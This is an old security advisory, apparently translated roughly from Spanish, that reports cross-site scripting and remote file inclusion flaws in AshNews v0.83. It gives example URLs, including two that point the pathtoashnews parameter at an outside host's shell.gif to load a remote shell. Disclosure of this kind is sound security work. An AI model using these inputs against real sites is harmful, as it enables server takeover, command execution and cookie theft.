########################################################################### # Advisory #7 Title: AshWebStudio AshNews Multiple Vulnerabilities # # # Author: 0o_zeus_o0 # Contact: zeus@diosdelared.com # Website: Security-mx.org # Date: 01/02/2006 # Risk: High # Vendor Url: http://dev.ashwebstudio.com/?section=ashnews # Affected Software: AshWebStudio AshNews # Non Affected: # # We Are: olimpus klan team # #Info: #================================================================ #the vulneravilidad of cross site scripting allows to a kidnapping of #identity by means of the robbery of the cookie, #this bug is in file ashnews.php. #now also are two bugs of high gravity which allow remote #cases out inclusion and the execution of commands #commands in the servant, #it is considered burdens so that deformation of the site or robbery #of confidential information can cause these errors #they are in the archives, #ashnews.php and ashheadlines.php # #Example cross site scripting: #================================================================ # #http://example.com/[ashdirpath]/ashnews.php?page=showcomments&id= # #Example Remote File Inclusion: #================================================================ #http://example.com/[ashdirpath]/ashheadlines.php?pathtoashnews= http://www.example.com/shell.gif? # #http://www.example.com/[ashdirpath]/ashnews.php?pathtoashnews= http://www.example.com/shell.gif? # #Solution: #================================================================ # #reported the vendor or in security-mx.org # # #VULNERABLE VERSIONS #================================================================ #ashnews v0.83 Other versions may also be affected. # # #================================================================ #Contact information #0o_zeus_o0 #zeus@diosdelared.com #www.Security-mx.org #================================================================ #greetz: lady fire,Mi beba, olimpus klan team and all security-mx ##############################################################################